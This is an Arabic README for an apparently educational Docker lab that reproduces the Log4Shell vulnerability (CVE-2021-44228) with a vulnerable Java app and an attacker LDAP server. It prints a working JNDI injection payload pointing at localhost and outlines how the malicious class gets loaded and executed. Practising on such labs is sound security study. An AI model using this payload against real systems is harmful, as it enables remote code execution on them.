بيئة مختبر ثغرة CVE-2021-44228 (Log4Shell)
مقدمة
يوفر هذا المشروع بيئة معزولة باستخدام Docker لممارسة وفهم ثغرة Log4j الحرجة المعروفة باسم CVE-2021-44228 (Log4Shell) بأمان.
الميزات الرئيسية
- بيئة اختبار آمنة ومعزولة باستخدام Docker
- إمكانية اختبار حمولات مخصصة
- تتضمن خادم LDAP الخاص بالمهاجم وتطبيق Java الضعيف
البدء
docker compose up --build
اختبار الحمولة
- يمكنك تعديل الحمولة في قسم الاختبار داخل
/vulnerable/Makefile
- الحمولة الافتراضية تستخدم
$${jndi:ldap://127.0.0.1:10000/}
كيف يعمل
- يبدأ تشغيل تطبيق Java الضعيف
- يستمع خادم LDAP الخاص بالمهاجم على المنفذ 10000
- يعمل التطبيق الضعيف
- يتم تسجيل حمولة Log4Shell في التطبيق الضعيف عبر قسم الاختبار في ملف Makefile
- يحاول التطبيق الضعيف إجراء بحث JNDI عبر LDAP
- يعيد خادم LDAP فئة Java خبيثة
- يقوم التطبيق الضعيف بتحميل هذه الفئة وتنفيذها